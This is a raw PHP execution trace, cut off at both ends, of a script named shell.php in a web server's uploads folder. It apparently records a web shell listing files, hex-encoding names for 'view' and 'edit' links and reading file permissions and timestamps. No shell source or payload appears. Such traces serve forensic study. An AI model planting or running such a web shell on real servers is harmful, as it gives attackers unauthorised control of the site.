2 1152 0 0.040308 485264 hex 1 /var/www/html/uploads/shell.php 128 1 '.htaccess'
2 A /var/www/html/uploads/shell.php 17 $r = ''
2 A /var/www/html/uploads/shell.php 18 $i = 0
3 1153 0 0.040339 485264 ord 0 /var/www/html/uploads/shell.php 19 1 '.'
3 1153 1 0.040350 485304
3 1153 R 46
3 1154 0 0.040362 485264 dechex 0 /var/www/html/uploads/shell.php 19 1 46
3 1154 1 0.040373 485336
3 1154 R '2e'
2 A /var/www/html/uploads/shell.php 19 $r .= '2e'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1155 0 0.040403 485296 ord 0 /var/www/html/uploads/shell.php 19 1 'h'
3 1155 1 0.040414 485336
3 1155 R 104
3 1156 0 0.040426 485296 dechex 0 /var/www/html/uploads/shell.php 19 1 104
3 1156 1 0.040437 485368
3 1156 R '68'
2 A /var/www/html/uploads/shell.php 19 $r .= '68'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1157 0 0.040466 485296 ord 0 /var/www/html/uploads/shell.php 19 1 't'
3 1157 1 0.040477 485336
3 1157 R 116
3 1158 0 0.040490 485296 dechex 0 /var/www/html/uploads/shell.php 19 1 116
3 1158 1 0.040501 485368
3 1158 R '74'
2 A /var/www/html/uploads/shell.php 19 $r .= '74'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1159 0 0.040530 485296 ord 0 /var/www/html/uploads/shell.php 19 1 'a'
3 1159 1 0.040541 485336
3 1159 R 97
3 1160 0 0.040553 485296 dechex 0 /var/www/html/uploads/shell.php 19 1 97
3 1160 1 0.040564 485368
3 1160 R '61'
2 A /var/www/html/uploads/shell.php 19 $r .= '61'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1161 0 0.040593 485304 ord 0 /var/www/html/uploads/shell.php 19 1 'c'
3 1161 1 0.040609 485344
3 1161 R 99
3 1162 0 0.040621 485304 dechex 0 /var/www/html/uploads/shell.php 19 1 99
3 1162 1 0.040633 485376
3 1162 R '63'
2 A /var/www/html/uploads/shell.php 19 $r .= '63'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1163 0 0.040662 485304 ord 0 /var/www/html/uploads/shell.php 19 1 'c'
3 1163 1 0.040673 485344
3 1163 R 99
3 1164 0 0.040685 485304 dechex 0 /var/www/html/uploads/shell.php 19 1 99
3 1164 1 0.040696 485376
3 1164 R '63'
2 A /var/www/html/uploads/shell.php 19 $r .= '63'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1165 0 0.040725 485304 ord 0 /var/www/html/uploads/shell.php 19 1 'e'
3 1165 1 0.040736 485344
3 1165 R 101
3 1166 0 0.040748 485304 dechex 0 /var/www/html/uploads/shell.php 19 1 101
3 1166 1 0.040759 485376
3 1166 R '65'
2 A /var/www/html/uploads/shell.php 19 $r .= '65'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1167 0 0.040787 485304 ord 0 /var/www/html/uploads/shell.php 19 1 's'
3 1167 1 0.040798 485344
3 1167 R 115
3 1168 0 0.040811 485304 dechex 0 /var/www/html/uploads/shell.php 19 1 115
3 1168 1 0.040822 485376
3 1168 R '73'
2 A /var/www/html/uploads/shell.php 19 $r .= '73'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1169 0 0.040850 485312 ord 0 /var/www/html/uploads/shell.php 19 1 's'
3 1169 1 0.040861 485352
3 1169 R 115
3 1170 0 0.040873 485312 dechex 0 /var/www/html/uploads/shell.php 19 1 115
3 1170 1 0.040885 485384
3 1170 R '73'
2 A /var/www/html/uploads/shell.php 19 $r .= '73'
2 A /var/www/html/uploads/shell.php 18 $i++
2 1152 1 0.040914 485312
2 1152 R '2e6874616363657373'
2 1171 0 0.040942 484408 is_file 0 /var/www/html/uploads/shell.php 124 1 '/var/www/html/uploads/data'
2 1171 1 0.040965 484448
2 1171 R FALSE
2 1172 0 0.040980 484416 is_file 0 /var/www/html/uploads/shell.php 124 1 '/var/www/html/uploads/prepend.php'
2 1172 1 0.040996 484464
2 1172 R TRUE
2 1173 0 0.041010 484424 filesize 0 /var/www/html/uploads/shell.php 125 1 '/var/www/html/uploads/prepend.php'
2 1173 1 0.041024 484464
2 1173 R 57
1 A /var/www/html/uploads/shell.php 125 $sz = 0.0556640625
2 1174 0 0.041049 484328 round 0 /var/www/html/uploads/shell.php 126 2 0.0556640625 3
2 1174 1 0.041063 484400
2 1174 R 0.056
1 A /var/www/html/uploads/shell.php 126 $sz = 0.056
1 A /var/www/html/uploads/shell.php 127 $sz = '0.056KB'
2 1175 0 0.041099 484360 hex 1 /var/www/html/uploads/shell.php 128 1 '/var/www/html/uploads'
2 A /var/www/html/uploads/shell.php 17 $r = ''
2 A /var/www/html/uploads/shell.php 18 $i = 0
3 1176 0 0.041130 484360 ord 0 /var/www/html/uploads/shell.php 19 1 '/'
3 1176 1 0.041142 484400
3 1176 R 47
3 1177 0 0.041154 484360 dechex 0 /var/www/html/uploads/shell.php 19 1 47
3 1177 1 0.041166 484432
3 1177 R '2f'
2 A /var/www/html/uploads/shell.php 19 $r .= '2f'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1178 0 0.041196 484392 ord 0 /var/www/html/uploads/shell.php 19 1 'v'
3 1178 1 0.041208 484432
3 1178 R 118
3 1179 0 0.041220 484392 dechex 0 /var/www/html/uploads/shell.php 19 1 118
3 1179 1 0.041231 484464
3 1179 R '76'
2 A /var/www/html/uploads/shell.php 19 $r .= '76'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1180 0 0.041261 484392 ord 0 /var/www/html/uploads/shell.php 19 1 'a'
3 1180 1 0.041273 484432
3 1180 R 97
3 1181 0 0.041284 484392 dechex 0 /var/www/html/uploads/shell.php 19 1 97
3 1181 1 0.041296 484464
3 1181 R '61'
2 A /var/www/html/uploads/shell.php 19 $r .= '61'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1182 0 0.041342 484392 ord 0 /var/www/html/uploads/shell.php 19 1 'r'
3 1182 1 0.041354 484432
3 1182 R 114
3 1183 0 0.041367 484392 dechex 0 /var/www/html/uploads/shell.php 19 1 114
3 1183 1 0.041378 484464
3 1183 R '72'
2 A /var/www/html/uploads/shell.php 19 $r .= '72'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1184 0 0.041411 484400 ord 0 /var/www/html/uploads/shell.php 19 1 '/'
3 1184 1 0.041422 484440
3 1184 R 47
3 1185 0 0.041434 484400 dechex 0 /var/www/html/uploads/shell.php 19 1 47
3 1185 1 0.041479 484472
3 1185 R '2f'
2 A /var/www/html/uploads/shell.php 19 $r .= '2f'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1186 0 0.041510 484400 ord 0 /var/www/html/uploads/shell.php 19 1 'w'
3 1186 1 0.041522 484440
3 1186 R 119
3 1187 0 0.041534 484400 dechex 0 /var/www/html/uploads/shell.php 19 1 119
3 1187 1 0.041545 484472
3 1187 R '77'
2 A /var/www/html/uploads/shell.php 19 $r .= '77'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1188 0 0.041574 484400 ord 0 /var/www/html/uploads/shell.php 19 1 'w'
3 1188 1 0.041585 484440
3 1188 R 119
3 1189 0 0.041597 484400 dechex 0 /var/www/html/uploads/shell.php 19 1 119
3 1189 1 0.041609 484472
3 1189 R '77'
2 A /var/www/html/uploads/shell.php 19 $r .= '77'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1190 0 0.041637 484400 ord 0 /var/www/html/uploads/shell.php 19 1 'w'
3 1190 1 0.041649 484440
3 1190 R 119
3 1191 0 0.041661 484400 dechex 0 /var/www/html/uploads/shell.php 19 1 119
3 1191 1 0.041672 484472
3 1191 R '77'
2 A /var/www/html/uploads/shell.php 19 $r .= '77'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1192 0 0.041701 484408 ord 0 /var/www/html/uploads/shell.php 19 1 '/'
3 1192 1 0.041712 484448
3 1192 R 47
3 1193 0 0.041724 484408 dechex 0 /var/www/html/uploads/shell.php 19 1 47
3 1193 1 0.041735 484480
3 1193 R '2f'
2 A /var/www/html/uploads/shell.php 19 $r .= '2f'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1194 0 0.041764 484408 ord 0 /var/www/html/uploads/shell.php 19 1 'h'
3 1194 1 0.041775 484448
3 1194 R 104
3 1195 0 0.041787 484408 dechex 0 /var/www/html/uploads/shell.php 19 1 104
3 1195 1 0.041798 484480
3 1195 R '68'
2 A /var/www/html/uploads/shell.php 19 $r .= '68'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1196 0 0.041827 484408 ord 0 /var/www/html/uploads/shell.php 19 1 't'
3 1196 1 0.041838 484448
3 1196 R 116
3 1197 0 0.041850 484408 dechex 0 /var/www/html/uploads/shell.php 19 1 116
3 1197 1 0.041861 484480
3 1197 R '74'
2 A /var/www/html/uploads/shell.php 19 $r .= '74'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1198 0 0.041890 484408 ord 0 /var/www/html/uploads/shell.php 19 1 'm'
3 1198 1 0.041901 484448
3 1198 R 109
3 1199 0 0.041913 484408 dechex 0 /var/www/html/uploads/shell.php 19 1 109
3 1199 1 0.041924 484480
3 1199 R '6d'
2 A /var/www/html/uploads/shell.php 19 $r .= '6d'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1200 0 0.041952 484416 ord 0 /var/www/html/uploads/shell.php 19 1 'l'
3 1200 1 0.041964 484456
3 1200 R 108
3 1201 0 0.041976 484416 dechex 0 /var/www/html/uploads/shell.php 19 1 108
3 1201 1 0.041987 484488
3 1201 R '6c'
2 A /var/www/html/uploads/shell.php 19 $r .= '6c'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1202 0 0.042016 484416 ord 0 /var/www/html/uploads/shell.php 19 1 '/'
3 1202 1 0.042027 484456
3 1202 R 47
3 1203 0 0.042040 484416 dechex 0 /var/www/html/uploads/shell.php 19 1 47
3 1203 1 0.042051 484488
3 1203 R '2f'
2 A /var/www/html/uploads/shell.php 19 $r .= '2f'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1204 0 0.042080 484416 ord 0 /var/www/html/uploads/shell.php 19 1 'u'
3 1204 1 0.042091 484456
3 1204 R 117
3 1205 0 0.042103 484416 dechex 0 /var/www/html/uploads/shell.php 19 1 117
3 1205 1 0.042115 484488
3 1205 R '75'
2 A /var/www/html/uploads/shell.php 19 $r .= '75'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1206 0 0.042149 484416 ord 0 /var/www/html/uploads/shell.php 19 1 'p'
3 1206 1 0.042160 484456
3 1206 R 112
3 1207 0 0.042172 484416 dechex 0 /var/www/html/uploads/shell.php 19 1 112
3 1207 1 0.042183 484488
3 1207 R '70'
2 A /var/www/html/uploads/shell.php 19 $r .= '70'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1208 0 0.042211 484424 ord 0 /var/www/html/uploads/shell.php 19 1 'l'
3 1208 1 0.042222 484464
3 1208 R 108
3 1209 0 0.042234 484424 dechex 0 /var/www/html/uploads/shell.php 19 1 108
3 1209 1 0.042245 484496
3 1209 R '6c'
2 A /var/www/html/uploads/shell.php 19 $r .= '6c'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1210 0 0.042274 484424 ord 0 /var/www/html/uploads/shell.php 19 1 'o'
3 1210 1 0.042285 484464
3 1210 R 111
3 1211 0 0.042297 484424 dechex 0 /var/www/html/uploads/shell.php 19 1 111
3 1211 1 0.042308 484496
3 1211 R '6f'
2 A /var/www/html/uploads/shell.php 19 $r .= '6f'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1212 0 0.042337 484424 ord 0 /var/www/html/uploads/shell.php 19 1 'a'
3 1212 1 0.042348 484464
3 1212 R 97
3 1213 0 0.042360 484424 dechex 0 /var/www/html/uploads/shell.php 19 1 97
3 1213 1 0.042371 484496
3 1213 R '61'
2 A /var/www/html/uploads/shell.php 19 $r .= '61'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1214 0 0.042400 484424 ord 0 /var/www/html/uploads/shell.php 19 1 'd'
3 1214 1 0.042411 484464
3 1214 R 100
3 1215 0 0.042423 484424 dechex 0 /var/www/html/uploads/shell.php 19 1 100
3 1215 1 0.042434 484496
3 1215 R '64'
2 A /var/www/html/uploads/shell.php 19 $r .= '64'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1216 0 0.042463 484440 ord 0 /var/www/html/uploads/shell.php 19 1 's'
3 1216 1 0.042474 484480
3 1216 R 115
3 1217 0 0.042486 484440 dechex 0 /var/www/html/uploads/shell.php 19 1 115
3 1217 1 0.042497 484512
3 1217 R '73'
2 A /var/www/html/uploads/shell.php 19 $r .= '73'
2 A /var/www/html/uploads/shell.php 18 $i++
2 1175 1 0.042526 484440
2 1175 R '2f7661722f7777772f68746d6c2f75706c6f616473'
2 1218 0 0.042541 484456 hex 1 /var/www/html/uploads/shell.php 128 1 'view'
2 A /var/www/html/uploads/shell.php 17 $r = ''
2 A /var/www/html/uploads/shell.php 18 $i = 0
3 1219 0 0.042572 484456 ord 0 /var/www/html/uploads/shell.php 19 1 'v'
3 1219 1 0.042583 484496
3 1219 R 118
3 1220 0 0.042595 484456 dechex 0 /var/www/html/uploads/shell.php 19 1 118
3 1220 1 0.042607 484528
3 1220 R '76'
2 A /var/www/html/uploads/shell.php 19 $r .= '76'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1221 0 0.042636 484488 ord 0 /var/www/html/uploads/shell.php 19 1 'i'
3 1221 1 0.042647 484528
3 1221 R 105
3 1222 0 0.042660 484488 dechex 0 /var/www/html/uploads/shell.php 19 1 105
3 1222 1 0.042671 484560
3 1222 R '69'
2 A /var/www/html/uploads/shell.php 19 $r .= '69'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1223 0 0.042700 484488 ord 0 /var/www/html/uploads/shell.php 19 1 'e'
3 1223 1 0.042711 484528
3 1223 R 101
3 1224 0 0.042723 484488 dechex 0 /var/www/html/uploads/shell.php 19 1 101
3 1224 1 0.042734 484560
3 1224 R '65'
2 A /var/www/html/uploads/shell.php 19 $r .= '65'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1225 0 0.042763 484488 ord 0 /var/www/html/uploads/shell.php 19 1 'w'
3 1225 1 0.042774 484528
3 1225 R 119
3 1226 0 0.042786 484488 dechex 0 /var/www/html/uploads/shell.php 19 1 119
3 1226 1 0.042797 484560
3 1226 R '77'
2 A /var/www/html/uploads/shell.php 19 $r .= '77'
2 A /var/www/html/uploads/shell.php 18 $i++
2 1218 1 0.042826 484496
2 1218 R '76696577'
2 1227 0 0.042842 484472 hex 1 /var/www/html/uploads/shell.php 128 1 'prepend.php'
2 A /var/www/html/uploads/shell.php 17 $r = ''
2 A /var/www/html/uploads/shell.php 18 $i = 0
3 1228 0 0.042873 484472 ord 0 /var/www/html/uploads/shell.php 19 1 'p'
3 1228 1 0.042884 484512
3 1228 R 112
3 1229 0 0.042896 484472 dechex 0 /var/www/html/uploads/shell.php 19 1 112
3 1229 1 0.042907 484544
3 1229 R '70'
2 A /var/www/html/uploads/shell.php 19 $r .= '70'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1230 0 0.042936 484504 ord 0 /var/www/html/uploads/shell.php 19 1 'r'
3 1230 1 0.042947 484544
3 1230 R 114
3 1231 0 0.042959 484504 dechex 0 /var/www/html/uploads/shell.php 19 1 114
3 1231 1 0.042970 484576
3 1231 R '72'
2 A /var/www/html/uploads/shell.php 19 $r .= '72'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1232 0 0.042999 484504 ord 0 /var/www/html/uploads/shell.php 19 1 'e'
3 1232 1 0.043010 484544
3 1232 R 101
3 1233 0 0.043022 484504 dechex 0 /var/www/html/uploads/shell.php 19 1 101
3 1233 1 0.043033 484576
3 1233 R '65'
2 A /var/www/html/uploads/shell.php 19 $r .= '65'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1234 0 0.043062 484504 ord 0 /var/www/html/uploads/shell.php 19 1 'p'
3 1234 1 0.043073 484544
3 1234 R 112
3 1235 0 0.043085 484504 dechex 0 /var/www/html/uploads/shell.php 19 1 112
3 1235 1 0.043096 484576
3 1235 R '70'
2 A /var/www/html/uploads/shell.php 19 $r .= '70'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1236 0 0.043125 484512 ord 0 /var/www/html/uploads/shell.php 19 1 'e'
3 1236 1 0.043136 484552
3 1236 R 101
3 1237 0 0.043148 484512 dechex 0 /var/www/html/uploads/shell.php 19 1 101
3 1237 1 0.043159 484584
3 1237 R '65'
2 A /var/www/html/uploads/shell.php 19 $r .= '65'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1238 0 0.043188 484512 ord 0 /var/www/html/uploads/shell.php 19 1 'n'
3 1238 1 0.043199 484552
3 1238 R 110
3 1239 0 0.043210 484512 dechex 0 /var/www/html/uploads/shell.php 19 1 110
3 1239 1 0.043221 484584
3 1239 R '6e'
2 A /var/www/html/uploads/shell.php 19 $r .= '6e'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1240 0 0.043256 484512 ord 0 /var/www/html/uploads/shell.php 19 1 'd'
3 1240 1 0.043267 484552
3 1240 R 100
3 1241 0 0.043279 484512 dechex 0 /var/www/html/uploads/shell.php 19 1 100
3 1241 1 0.043290 484584
3 1241 R '64'
2 A /var/www/html/uploads/shell.php 19 $r .= '64'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1242 0 0.043319 484512 ord 0 /var/www/html/uploads/shell.php 19 1 '.'
3 1242 1 0.043330 484552
3 1242 R 46
3 1243 0 0.043342 484512 dechex 0 /var/www/html/uploads/shell.php 19 1 46
3 1243 1 0.043353 484584
3 1243 R '2e'
2 A /var/www/html/uploads/shell.php 19 $r .= '2e'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1244 0 0.043382 484520 ord 0 /var/www/html/uploads/shell.php 19 1 'p'
3 1244 1 0.043393 484560
3 1244 R 112
3 1245 0 0.043405 484520 dechex 0 /var/www/html/uploads/shell.php 19 1 112
3 1245 1 0.043416 484592
3 1245 R '70'
2 A /var/www/html/uploads/shell.php 19 $r .= '70'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1246 0 0.043445 484520 ord 0 /var/www/html/uploads/shell.php 19 1 'h'
3 1246 1 0.043456 484560
3 1246 R 104
3 1247 0 0.043468 484520 dechex 0 /var/www/html/uploads/shell.php 19 1 104
3 1247 1 0.043480 484592
3 1247 R '68'
2 A /var/www/html/uploads/shell.php 19 $r .= '68'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1248 0 0.043508 484520 ord 0 /var/www/html/uploads/shell.php 19 1 'p'
3 1248 1 0.043519 484560
3 1248 R 112
3 1249 0 0.043531 484520 dechex 0 /var/www/html/uploads/shell.php 19 1 112
3 1249 1 0.043542 484592
3 1249 R '70'
2 A /var/www/html/uploads/shell.php 19 $r .= '70'
2 A /var/www/html/uploads/shell.php 18 $i++
2 1227 1 0.043575 484520
2 1227 R '70726570656e642e706870'
2 1250 0 0.043590 484648 filemtime 0 /var/www/html/uploads/shell.php 128 1 '/var/www/html/uploads/prepend.php'
2 1250 1 0.043605 484688
2 1250 R 1676261585
2 1251 0 0.043618 484584 date 0 /var/www/html/uploads/shell.php 128 2 'Y-m-d H:i' 1676261585
2 1251 1 0.043653 484912
2 1251 R '2023-02-12 23:13'
2 1252 0 0.043668 484744 is_writable 0 /var/www/html/uploads/shell.php 128 1 '/var/www/html/uploads/prepend.php'
2 1252 1 0.043688 484784
2 1252 R FALSE
2 1253 0 0.043701 484744 is_readable 0 /var/www/html/uploads/shell.php 128 1 '/var/www/html/uploads/prepend.php'
2 1253 1 0.043716 484784
2 1253 R TRUE
2 1254 0 0.043731 484744 perms 1 /var/www/html/uploads/shell.php 128 1 '/var/www/html/uploads/prepend.php'
3 1255 0 0.043744 484744 fileperms 0 /var/www/html/uploads/shell.php 32 1 '/var/www/html/uploads/prepend.php'
3 1255 1 0.043757 484784
3 1255 R 33261
2 A /var/www/html/uploads/shell.php 32 $p = 33261
2 A /var/www/html/uploads/shell.php 38 $i = '-'
2 A /var/www/html/uploads/shell.php 50 $i .= 'r'
2 A /var/www/html/uploads/shell.php 51 $i .= 'w'
2 A /var/www/html/uploads/shell.php 52 $i .= 'x'
2 A /var/www/html/uploads/shell.php 53 $i .= 'r'
2 A /var/www/html/uploads/shell.php 54 $i .= '-'
2 A /var/www/html/uploads/shell.php 55 $i .= 'x'
2 A /var/www/html/uploads/shell.php 56 $i .= 'r'
2 A /var/www/html/uploads/shell.php 57 $i .= '-'
2 A /var/www/html/uploads/shell.php 58 $i .= 'x'
2 1254 1 0.043870 484784
2 1254 R '-rwxr-xr-x'
2 1256 0 0.043885 484744 hex 1 /var/www/html/uploads/shell.php 128 1 '/var/www/html/uploads'
2 A /var/www/html/uploads/shell.php 17 $r = ''
2 A /var/www/html/uploads/shell.php 18 $i = 0
3 1257 0 0.043915 484744 ord 0 /var/www/html/uploads/shell.php 19 1 '/'
3 1257 1 0.043927 484784
3 1257 R 47
3 1258 0 0.043939 484744 dechex 0 /var/www/html/uploads/shell.php 19 1 47
3 1258 1 0.043951 484816
3 1258 R '2f'
2 A /var/www/html/uploads/shell.php 19 $r .= '2f'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1259 0 0.043981 484776 ord 0 /var/www/html/uploads/shell.php 19 1 'v'
3 1259 1 0.043993 484816
3 1259 R 118
3 1260 0 0.044005 484776 dechex 0 /var/www/html/uploads/shell.php 19 1 118
3 1260 1 0.044017 484848
3 1260 R '76'
2 A /var/www/html/uploads/shell.php 19 $r .= '76'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1261 0 0.044048 484776 ord 0 /var/www/html/uploads/shell.php 19 1 'a'
3 1261 1 0.044059 484816
3 1261 R 97
3 1262 0 0.044071 484776 dechex 0 /var/www/html/uploads/shell.php 19 1 97
3 1262 1 0.044083 484848
3 1262 R '61'
2 A /var/www/html/uploads/shell.php 19 $r .= '61'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1263 0 0.044113 484776 ord 0 /var/www/html/uploads/shell.php 19 1 'r'
3 1263 1 0.044124 484816
3 1263 R 114
3 1264 0 0.044136 484776 dechex 0 /var/www/html/uploads/shell.php 19 1 114
3 1264 1 0.044148 484848
3 1264 R '72'
2 A /var/www/html/uploads/shell.php 19 $r .= '72'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1265 0 0.044177 484784 ord 0 /var/www/html/uploads/shell.php 19 1 '/'
3 1265 1 0.044189 484824
3 1265 R 47
3 1266 0 0.044201 484784 dechex 0 /var/www/html/uploads/shell.php 19 1 47
3 1266 1 0.044213 484856
3 1266 R '2f'
2 A /var/www/html/uploads/shell.php 19 $r .= '2f'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1267 0 0.044242 484784 ord 0 /var/www/html/uploads/shell.php 19 1 'w'
3 1267 1 0.044253 484824
3 1267 R 119
3 1268 0 0.044266 484784 dechex 0 /var/www/html/uploads/shell.php 19 1 119
3 1268 1 0.044277 484856
3 1268 R '77'
2 A /var/www/html/uploads/shell.php 19 $r .= '77'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1269 0 0.044309 484784 ord 0 /var/www/html/uploads/shell.php 19 1 'w'
3 1269 1 0.044321 484824
3 1269 R 119
3 1270 0 0.044333 484784 dechex 0 /var/www/html/uploads/shell.php 19 1 119
3 1270 1 0.044345 484856
3 1270 R '77'
2 A /var/www/html/uploads/shell.php 19 $r .= '77'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1271 0 0.044374 484784 ord 0 /var/www/html/uploads/shell.php 19 1 'w'
3 1271 1 0.044385 484824
3 1271 R 119
3 1272 0 0.044397 484784 dechex 0 /var/www/html/uploads/shell.php 19 1 119
3 1272 1 0.044408 484856
3 1272 R '77'
2 A /var/www/html/uploads/shell.php 19 $r .= '77'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1273 0 0.044436 484792 ord 0 /var/www/html/uploads/shell.php 19 1 '/'
3 1273 1 0.044448 484832
3 1273 R 47
3 1274 0 0.044460 484792 dechex 0 /var/www/html/uploads/shell.php 19 1 47
3 1274 1 0.044471 484864
3 1274 R '2f'
2 A /var/www/html/uploads/shell.php 19 $r .= '2f'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1275 0 0.044500 484792 ord 0 /var/www/html/uploads/shell.php 19 1 'h'
3 1275 1 0.044511 484832
3 1275 R 104
3 1276 0 0.044523 484792 dechex 0 /var/www/html/uploads/shell.php 19 1 104
3 1276 1 0.044535 484864
3 1276 R '68'
2 A /var/www/html/uploads/shell.php 19 $r .= '68'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1277 0 0.044564 484792 ord 0 /var/www/html/uploads/shell.php 19 1 't'
3 1277 1 0.044575 484832
3 1277 R 116
3 1278 0 0.044587 484792 dechex 0 /var/www/html/uploads/shell.php 19 1 116
3 1278 1 0.044598 484864
3 1278 R '74'
2 A /var/www/html/uploads/shell.php 19 $r .= '74'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1279 0 0.044627 484792 ord 0 /var/www/html/uploads/shell.php 19 1 'm'
3 1279 1 0.044638 484832
3 1279 R 109
3 1280 0 0.044651 484792 dechex 0 /var/www/html/uploads/shell.php 19 1 109
3 1280 1 0.044662 484864
3 1280 R '6d'
2 A /var/www/html/uploads/shell.php 19 $r .= '6d'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1281 0 0.044691 484800 ord 0 /var/www/html/uploads/shell.php 19 1 'l'
3 1281 1 0.044702 484840
3 1281 R 108
3 1282 0 0.044714 484800 dechex 0 /var/www/html/uploads/shell.php 19 1 108
3 1282 1 0.044725 484872
3 1282 R '6c'
2 A /var/www/html/uploads/shell.php 19 $r .= '6c'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1283 0 0.044754 484800 ord 0 /var/www/html/uploads/shell.php 19 1 '/'
3 1283 1 0.044765 484840
3 1283 R 47
3 1284 0 0.044777 484800 dechex 0 /var/www/html/uploads/shell.php 19 1 47
3 1284 1 0.044788 484872
3 1284 R '2f'
2 A /var/www/html/uploads/shell.php 19 $r .= '2f'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1285 0 0.044817 484800 ord 0 /var/www/html/uploads/shell.php 19 1 'u'
3 1285 1 0.044828 484840
3 1285 R 117
3 1286 0 0.044840 484800 dechex 0 /var/www/html/uploads/shell.php 19 1 117
3 1286 1 0.044852 484872
3 1286 R '75'
2 A /var/www/html/uploads/shell.php 19 $r .= '75'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1287 0 0.044881 484800 ord 0 /var/www/html/uploads/shell.php 19 1 'p'
3 1287 1 0.044891 484840
3 1287 R 112
3 1288 0 0.044903 484800 dechex 0 /var/www/html/uploads/shell.php 19 1 112
3 1288 1 0.044914 484872
3 1288 R '70'
2 A /var/www/html/uploads/shell.php 19 $r .= '70'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1289 0 0.044943 484808 ord 0 /var/www/html/uploads/shell.php 19 1 'l'
3 1289 1 0.044954 484848
3 1289 R 108
3 1290 0 0.044966 484808 dechex 0 /var/www/html/uploads/shell.php 19 1 108
3 1290 1 0.044980 484880
3 1290 R '6c'
2 A /var/www/html/uploads/shell.php 19 $r .= '6c'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1291 0 0.045013 484808 ord 0 /var/www/html/uploads/shell.php 19 1 'o'
3 1291 1 0.045025 484848
3 1291 R 111
3 1292 0 0.045037 484808 dechex 0 /var/www/html/uploads/shell.php 19 1 111
3 1292 1 0.045048 484880
3 1292 R '6f'
2 A /var/www/html/uploads/shell.php 19 $r .= '6f'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1293 0 0.045077 484808 ord 0 /var/www/html/uploads/shell.php 19 1 'a'
3 1293 1 0.045088 484848
3 1293 R 97
3 1294 0 0.045100 484808 dechex 0 /var/www/html/uploads/shell.php 19 1 97
3 1294 1 0.045111 484880
3 1294 R '61'
2 A /var/www/html/uploads/shell.php 19 $r .= '61'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1295 0 0.045140 484808 ord 0 /var/www/html/uploads/shell.php 19 1 'd'
3 1295 1 0.045151 484848
3 1295 R 100
3 1296 0 0.045165 484808 dechex 0 /var/www/html/uploads/shell.php 19 1 100
3 1296 1 0.045176 484880
3 1296 R '64'
2 A /var/www/html/uploads/shell.php 19 $r .= '64'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1297 0 0.045207 484824 ord 0 /var/www/html/uploads/shell.php 19 1 's'
3 1297 1 0.045240 484864
3 1297 R 115
3 1298 0 0.045254 484824 dechex 0 /var/www/html/uploads/shell.php 19 1 115
3 1298 1 0.045265 484896
3 1298 R '73'
2 A /var/www/html/uploads/shell.php 19 $r .= '73'
2 A /var/www/html/uploads/shell.php 18 $i++
2 1256 1 0.045314 484824
2 1256 R '2f7661722f7777772f68746d6c2f75706c6f616473'
2 1299 0 0.045330 484808 hex 1 /var/www/html/uploads/shell.php 128 1 'edit'
2 A /var/www/html/uploads/shell.php 17 $r = ''
2 A /var/www/html/uploads/shell.php 18 $i = 0
3 1300 0 0.045360 484808 ord 0 /var/www/html/uploads/shell.php 19 1 'e'
3 1300 1 0.045372 484848
3 1300 R 101
3 1301 0 0.045384 484808 dechex 0 /var/www/html/uploads/shell.php 19 1 101
3 1301 1 0.045395 484880
3 1301 R '65'
2 A /var/www/html/uploads/shell.php 19 $r .= '65'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1302 0 0.045424 484840 ord 0 /var/www/html/uploads/shell.php 19 1 'd'
3 1302 1 0.045435 484880
3 1302 R 100
3 1303 0 0.045447 484840 dechex 0 /var/www/html/uploads/shell.php 19 1 100
3 1303 1 0.045459 484912
3 1303 R '64'
